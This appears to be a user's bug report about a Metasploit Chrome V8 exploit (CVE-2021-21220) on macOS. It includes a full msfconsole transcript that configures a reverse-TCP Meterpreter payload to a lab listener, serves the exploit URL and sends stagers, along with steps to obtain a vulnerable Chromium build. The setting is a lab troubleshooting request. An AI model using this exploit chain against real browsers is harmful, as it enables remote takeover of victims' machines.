I am not sure if I am doing something wrong here, but I am encountering the error below when I am testing "cve_2021_21220_v8_insufficient_validation" against macOS with a vulnerable browser: the session dies after some time, while the browser keeps loading the exploit URL. This exploit works perfectly on Windows, but I got some issue on macOS.
System version: macOS 14.6.1 (23G93)
Chromium: Version 90.0.4430.0 (Developer Build) (x86_64)
Configuration: (MSF is running on Kali VM and network is on NAT, base is macOS which has Chrome running.)
msf6 > search cve_2021_21220
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation 2021-04-13 manual No Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation
msf6 > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set TArGET 2
TArGET => 2
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/ssh/interact normal No Interact with Established SSH Connection
5 payload/osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager
6 payload/osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager
7 payload/osx/x64/dupandexecve/reverse_tcp_uuid normal No OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
8 payload/osx/x64/exec normal No OS X x64 Execute Command
9 payload/osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager
10 payload/osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager
11 payload/osx/x64/meterpreter/reverse_tcp_uuid normal No OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
12 payload/osx/x64/say normal No OS X x64 say Shellcode
13 payload/osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP
14 payload/osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set PAYLOAD 11
PAYLOAD => osx/x64/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set LHOST 172.16.30.21
LHOST => 172.16.30.21
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set URIPATH /doodoo
URIPATH => /doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > options
Module options (exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /doodoo no The URI to use for this exploit (default is random)
Payload options (osx/x64/meterpreter/reverse_tcp_uuid):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.30.21 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)
View the full module info with the info, or info -d command.
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.30.21:4444
[*] Using URL: http://172.16.30.21:8080/doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > [*] Server started.
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
[*] 172.16.30.1 chrome_cve_2021_21220_v8_insufficient_validation - Sending /doodoo to Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36
[*] Transmitting first stager...(214 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (810648 bytes) to 172.16.30.1
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
[-] The "sysinfo" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
meterpreter > load stdapi
[-] The "load" command is not supported by this Meterpreter type (x64/osx)
meterpreter >
[-] Meterpreter session 1 is not valid and will be closed
[*] 172.16.30.1 - Meterpreter session 1 closed.
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > version
Framework: 6.3.27-dev
Console : 6.3.27-dev
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
Running Chrome:
Downloading Vuln Chromium:
Navigate to https://vikyd.github.io/download-chromium-history-version/#/, select Mac and put in the version, i.e., 90.0.4430.00; it should make a redirect to Chromium.